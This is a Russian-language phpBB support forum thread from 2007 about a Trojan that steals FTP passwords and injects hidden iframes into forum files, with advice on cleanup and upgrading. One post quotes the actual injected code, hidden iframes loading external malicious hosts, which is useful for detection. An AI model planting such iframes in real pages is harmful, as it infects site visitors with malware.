Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).

Как убить Трояна?

Сообщение AdmninsCluba 12.05.2007 16:23

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.
AdmninsCluba
phpBB 1.0.0
 
Сообщения: 6
Зарегистрирован: 03.09.2006 19:10

Сообщение crash 12.05.2007 16:31

AdmninsCluba писал(а):Что надо сделать чтобы найти и убить скрипт?

антивирус.
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Аватара пользователя
crash
Support Team Leader
 
Сообщения: 6277
Зарегистрирован: 07.07.2004 17:12
Откуда: Мирный

Сообщение AdmninsCluba 12.05.2007 16:44

антивирус.


Касперский стоит.

Хостер сказал, что Троян залез через дырку форума. Где искать и исправлять проблему с Трояном? В паках управления, или Админ панели форума?
AdmninsCluba
phpBB 1.0.0
 
Сообщения: 6
Зарегистрирован: 03.09.2006 19:10

Сообщение Палыч 12.05.2007 16:45

AdmninsCluba писал(а):Хостер сказал, что Троян залез через дырку форума.

Тогда пусть хостер и скажет, где эта дырка
Не все то WINDOWS, что висит... phpBB только учусь.
ICQ, email, ЛС - только для личных сообщений. Вопросы по phpbb только на форумах. По найму не работаю.
Никогда не бойся делать то, что ты пока не умеешь. Помни, что Ковчег был построен любителем. Профессионалы строили Титаник...
Аватара пользователя
Палыч
Просто Палыч
 
Сообщения: 6003
Зарегистрирован: 24.05.2006 23:20
Откуда: Питер

Сообщение rxu 12.05.2007 16:49

AdmninsCluba
А если не секрет, какая версия phpBB установлена?
Изображение
Аватара пользователя
rxu
phpBB Guru
 
Сообщения: 4319
Зарегистрирован: 12.05.2006 18:16
Откуда: Красноярск

Сообщение crash 12.05.2007 16:50

AdmninsCluba
ну так вот каспреского и натравите на файлы, если он у вас стоит на сервере
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Аватара пользователя
crash
Support Team Leader
 
Сообщения: 6277
Зарегистрирован: 07.07.2004 17:12
Откуда: Мирный

Сообщение AdmninsCluba 12.05.2007 17:05

А если не секрет, какая версия phpBB установлена?

Версия phpBB 2.0.20, час назад попытался обновить до phpBB 2.0.21.

Но версия не поменялась в админ панели. Может надо обновить форум?
ну так вот каспреского и натравите на файлы, если он у вас стоит на сервере

Локалхоста нет. Резервную копию откатываю папками.

Касперский найдет проблему в папках на компьютере или нет? Обязательно нужен Денвер?
AdmninsCluba
phpBB 1.0.0
 
Сообщения: 6
Зарегистрирован: 03.09.2006 19:10

Сообщение crash 12.05.2007 17:10

AdmninsCluba писал(а):Версия phpBB 2.0.20, час назад попытался обновить до phpBB 2.0.21.

уже полгода назад надо было до 2.0.22 обновить. Так что сносите все файлы и заливайте последнюю версию.
AdmninsCluba писал(а):Касперский найдет проблему в папках на компьютере или нет?

на вашем компьютере он найдет все что угодно.
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Аватара пользователя
crash
Support Team Leader
 
Сообщения: 6277
Зарегистрирован: 07.07.2004 17:12
Откуда: Мирный

Сообщение AdmninsCluba 12.05.2007 17:39

crash писал(а):уже полгода назад надо было до 2.0.22 обновить. Так что сносите все файлы и заливайте последнюю версию.


Почему я с трояном не смогу обновить версию форума?
AdmninsCluba
phpBB 1.0.0
 
Сообщения: 6
Зарегистрирован: 03.09.2006 19:10

Сообщение crash 12.05.2007 17:50

AdmninsCluba писал(а):Почему я с трояном не смогу обновить версию форума?

AdmninsCluba писал(а):Почистил файл - index.php. Не помогло

можете, но так с ним и останетесь
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Аватара пользователя
crash
Support Team Leader
 
Сообщения: 6277
Зарегистрирован: 07.07.2004 17:12
Откуда: Мирный

Сообщение edgar 12.05.2007 19:16

Сейчас эпидемия. Троян приобретается от зараженных сайтов через браузер IE, ворует пароли FTP (и не только) и заражает новые сайты.
Признак - левый iframe в коде страниц.
Надо удалить код с сайта, выполнить полную проверку компа (последние НОД и Каспер вроде убивают их, но сейчас много таких троянов), убить IE и ставить чистый и больше им не пользоваться. :) Ну может еще что-то надо...
Ни к каким уязвимостям форумов и хостеров это не относится. Смотрите Гугл, там всё есть
Три простых способа защиты от спама на форуме phpBB 2.0.22: 1, 2, 3
Аватара пользователя
edgar
phpBB 2.0.18
 
Сообщения: 1149
Зарегистрирован: 26.07.2005 7:20
Откуда: с Луны свалил...

Сообщение go 12.05.2007 19:57

edgar писал(а):убить IE и ставить чистый и больше им не пользоваться.

зачем ставить если в последствии дается совет - более не пользоватся? :(
или сайтом не пользоваться?
Аватара пользователя
go
phpBB 2.0.7
 
Сообщения: 288
Зарегистрирован: 14.03.2006 0:12

Сообщение edgar 12.05.2007 20:18

go писал(а):зачем ставить

А как же при переустановке винды его не поставить? :( Или у вас другая ос.

Я в общем нашел, что троян убивает только файл iexplore.exe. Выявляется это и лечится утилитой HaxFix 4.41
У меня ссылка есть, но я ее не дам, так как это haxfix.exe. Подумаете еще плохое что-нибудь... :) Но найти не сложно.
После запуска надо выбрать 2. Run auto fix
Ну и потом, естественно все пароли сменить - фтп, аськи и т.д.
Три простых способа защиты от спама на форуме phpBB 2.0.22: 1, 2, 3
Аватара пользователя
edgar
phpBB 2.0.18
 
Сообщения: 1149
Зарегистрирован: 26.07.2005 7:20
Откуда: с Луны свалил...

Сообщение Xpert 23.05.2007 9:20

Некоторые технические подробности, поскольку недавно один клиент подцепил подобного трояна...

Внедряется в
admin/index.php
login.php
index.php
includes/auth.php


Добавляет такой код:
Код: Выделить всё
<iframe src='http://kleman.info' width='1' height='1' style='visibility: hidden;'></iframe>

Или такой
Код: Выделить всё
<iframe src='http://tstats.biz/st/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Или оба вместе

Еще его вставляют в файлы index.html в папках.

После того как был сменен пароль на FTP, проблемы исчезли.
Эксперт - это человек, который избегает мелких ошибок на пути к грандиозному провалу.
Любая более-менее сложная задача имеет несколько простых, изящных, лёгких для понимания неправильных решений
Аватара пользователя
Xpert
phpBB Guru
 
Сообщения: 5710
Зарегистрирован: 13.03.2004 22:27
Откуда: msk.ru

Сообщение amelanin 23.05.2007 9:59

У меня такое было - подробности кидал тут - http://tsbs.ru/forum/index.php?showtopic=2924&st=0

обнаружено - пароли свистят из ftp менеджера, в основном тотал-коммандера.
сайты заражаются 2-3 раза в месяц.
т.е. каждые дней десять.
страдают все индексные файлы main.* defolt.* index.* c любыми расширениями.
о том что страдает login.php и auth.php слышу впервые - однако вполне возможно.
логи показывают что скрипт шарится по всем папкам в поисках индексного файла.
при воздействии иногда просто добавляется iframe а иногда этот iframe полностью стирает всю страницу вписывая себя.
Аватара пользователя
amelanin
phpBB 1.4.0
 
Сообщения: 37
Зарегистрирован: 07.09.2006 7:08
Откуда: Санкт-Петербург

След.

Вернуться в phpBB-пространство

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 0